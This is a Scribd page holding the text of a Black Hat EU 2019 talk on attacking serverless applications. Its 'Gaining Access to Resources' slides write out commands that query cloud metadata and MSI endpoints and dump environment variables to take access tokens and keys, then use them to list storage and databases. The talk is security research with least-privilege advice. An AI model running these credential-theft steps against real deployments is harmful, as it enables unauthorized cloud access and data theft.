Scribd
Upload
144 views29 pages

Eu 19 Melamed Alexa Hack My Server Less Please PDF

The document discusses gaining unauthorized access to resources in serverless computing environments through poor coding practices and misconfigurations. It provides examples of exploiting credentials and permissions that are exposed by functions to access internal services, external APIs, and sensitive data. The summaries show how permissions can be configured restrictively at the bucket level instead of broadly to mitigate these risks.

Uploaded by

Sven Christian Goerz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
144 views29 pages

Eu 19 Melamed Alexa Hack My Server Less Please PDF

The document discusses gaining unauthorized access to resources in serverless computing environments through poor coding practices and misconfigurations. It provides examples of exploiting credentials and permissions that are exposed by functions to access internal services, external APIs, and sensitive data. The summaries show how permissions can be configured restrictively at the bucket level instead of broadly to mitigate these risks.

Uploaded by

Sven Christian Goerz
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 29

Tal Melamed

@ 4ppsec

Head of Security Research

Alexa,
Hack My Server(less) Please
4ppsec

@ 4ppsec

talmelamed

[email protected]

appsec.it
Alexa, The Hacking Assistant
[email protected]
Disclaimer

The exploits discussed in this talk are not a result of

vulnerabilities in the cloud infrastructure (i.e. Serverless).

Rather, the exploits take advantage on poor coding and

misconfigurations in the application level.

@ 4ppsec
Housekeeping
Base Camp
Interesting Stuff
Related Work
Q&A
@ 4ppsec
Why Serverless?

@ 4ppsec
Serverless Market Share
The Evolution of Cloud Computing

@ 4ppsec
Shared Responsibility in the Cloud

@ 4ppsec
Event-Driven Architecture

Your code.

Your mistakes...

@ 4ppsec
Internal Network

Sensitive
Misconfigured
FirewallData

Security
Controls
Attack / Vector
Single Purpose Container

Ephemeral

Except from:
Read Only Except from /tmp
/tmp and /home

23+ 12+
8
http (apigw), email, code, http, blob, cosmosdb,
http, pub/sub, firestore,
Triggers dynamodb, sns, sqs, s3, timer, event grid/hub,
Firebase x4 (config, db,
mqtt, alexa, log, auth, queue, iot, sendgrid, ...
auth, analytics), storage
3rd-party, ...

/var/task /home/site/wwwroot *
Source Code /user_code/
/proc/{id}/cwd
*(for http)

@ 4ppsec
Sum it up

Gaining Access to Resources

curl
'http://metadata.google.internal/computeMetadata/v1/instance/se
rvice-accounts/default/token' -H 'Metadata-Flavor: Google'

{"access_token":"ya29.c.KqUBsdenNSGhEgLBLJJaA9QF2lIYxREMjPTe-1RcGSjLCIA0l4bXZdz
TWw7J1F69oEg2DiwAxD_LO6NZcGoCaPn0UEO5ODzdGdTNPn_kyKicduMZyrWCZ2S_g8eVdxY4wx
7SPerLoueoTuA79xi2sutqa186EPVJKBXeK1FwIirQ7Qfo2hZ-FyniQKD-_ICtRYhZ7VZrpaFBbXuFbG-Rj
A4pdNLfpaTV","expires_in":1054,"token_type":"Bearer"}

curl https://storage.googleapis.com/storage/v1/b?project=bh19eu
-H"Authorization: Bearer
ya29.c.KqUBsdenNSGhEgLBLJJaA9QF2lIYxREMjPTe-1RcGSjLCIA0l4bXZdzTWw7J1F69oEg2
DiwAxD_LO6NZcGoCaPn0UEO5ODzdGdTNPn_kyKicduMZyrWCZ2S_g8eVdxY4wx7SPerLo
ueoTuA79xi2sutqa186EPVJKBXeK1FwIirQ7Qfo2hZ-FyniQKD-_ICtRYhZ7VZrpaFBbXuFbG-R
jA4pdNLfpaTV" | jq

@ 4ppsec
Sum it up

Gaining Access to Resources

env $ AWS_SESSION_TOKEN=IQoJb3JpZ2l2VjEC0aCXV
…qLJc5uP/vmucPb2/J9SX05U=
AWS_LAMBDA_FUNCTION_VERSION=$LATEST AWS_SECRET_ACCESS_KEY=B2A++2GxZbX9oC7l123123123SUCyJCpq123123123
AWS_SESSION_TOKEN=IQoJb3JpZ2l2VjEC0aCXV …qLJc5uP/vmucPb2/J9SX05U= AWS_ACCESS_KEY_ID=ASIAYO3RCHM123123123 aws dynamodb list-tables
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/test-env
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib
AWS_EXECUTION_ENV=AWS_Lambda_python3.8 {
AWS_LAMBDA_FUNCTION_NAME=test-env "TableNames": [
PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin "DVSA-INVENTORY-DB",
AWS_DEFAULT_REGION=us-east-1 "DVSA-ORDERS-DB",
PWD=/var/task "DVSA-USERS-DB",
AWS_SECRET_ACCESS_KEY=B2A++2GxZbX9oC7l123123123SUCyJCpq123123123 "demo_security_events",
AWS_REGION=us-east-1 "slacker-slack-messages",
AWS_ACCESS_KEY_ID=ASIAYO3RCHM123123123 "test-table-tmp"
_HANDLER=lambda_function.lambda_handler ]
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128 }

@ 4ppsec
Sum it up

Gaining Access to Resources

env {
"access_token": " eyJXaGF0IGFyy/Bmb3IIj...bm90IGEgtlbiJ9",
"expires_on": "11/14/2019 02:12:42 PM +10:00",
WEBSITE_CORS_SUPPORT_CREDENTIALS=False
"resource": "https://bh19-app-vault.vault.azure.net",
HOME=/home
"token_type": "Bearer"
APPSETTING_AzureWebJobsStorage=DefaultEndpointsProtocol=https;AccountNa
}
me=storageaccounttestbdb3;AccountKey=OfBOA...7EU/r2tQ==
WEBSITE_HOSTNAME=bheu19.azurewebsites.net
curl -X GET -H "Authorization: Bearer $token" -H
WEBSITE_AUTH_ENCRYPTION_KEY=17F259...1D151C8EEAB55D3E860B49C7C73A39A2DF
"Content-Type: application/json"
FF
https://management.azure.com/subscriptions/{subscriptionId}
AzureWebJobsScriptRoot=/home/site/wwwroot
?api-version=2019-06-01 | jq
MACHINEKEY_DecryptionKey=17F259...1D151A0E8C8EAB55D3E860B49C7C73A39A2DF
FF
MSI_ENDPOINT=http://172.16.0.6:8081/msi/token
{
MSI_SECRET=fc2f077b-1d28-4e2e-bf26-61d8fa241deb
"environmentName": "AzureCloud",
WEBSITE_CORS_ALLOWED_ORIGINS=https://functions.azure.com,https://functi
"id": "12365123-6123-4123-8123-0612312393ab",
ons-staging.azure.com,https://functions-next.azure.com
"name": "Azure subscription",
PWD=/home/site/wwwroot
"tenantId": "ab123123-1231-1231-8123-c123123123cd",
SSH_PORT=2222
"user": {
WEBSITE_AUTH_SIGNING_KEY=801506D5B06D9...55816144E733C239C2E1B654F87560
"name": "[email protected]",
1
"type": "user"
}
}
curl http://172.16.0.6:8081/msi/token -H "Secret:
fc2f077b-1d28-4e2e-bf26-61d8fa241deb"
@ 4ppsec
s3 = boto3.client( 's3')
bucket = event[ 'Records'][0]['s3']['bucket']['name']
key = event[ 'Records'][0]['s3']['object']['key']
try:
response = s3.get_object(Bucket=bucket, Key=key)
except ClientError as e:
logging.error(e)
return None
# Return an open StreamingBody object
return response['Body']

{ { {
"Version": "2012-10-17", "Version": "2012-10-17", "Version": "2012-10-17",
"Statement": [{ "Statement": [{ "Statement": [{
"Effect": "Allow", "Effect": "Allow", "Effect": "Allow",
"Action": ["s3:*"], "Action": ["s3:*"], "Action": ["s3:GetObject"],
"Resource": "Resource": "Resource":
["arn:aws:s3:::*"] ["arn:aws:s3:::myBucket/*"] ["arn:aws:s3:::myBucket/*"]
}] }] }]
} } }

@ 4ppsec
Disclaimer

It’s not them. Its You!

@ 4ppsec
REST API / 3rd Party App (Slack)

@ 4ppsec
@ 4ppsec
Cloud Storage

@ 4ppsec
Email

@ 4ppsec
Alexa, please hack my server(less)

@ 4ppsec
@ 4ppsec
New Attack Vectors REST API
3rd-party App
Cloud Storage (e.g. file)
Authentication process
Logs
Email
Pub/Sub notification
IoT (e.g. voice-command, mqtt)
Code commit
Data Analytics
@ 4ppsec
Related Projects

@ 4ppsec
Black Hat Sound Bytes

● Loss of perimeter → Ambiguous attack vectors

● Follow the Least-Privilege Principle

● Automate, authomate, automate!

● Serverless might be the most secure environment for your application

@ 4ppsec
Thank you! | Q&A

Alexa, Hack My Server(less) Please

You might also like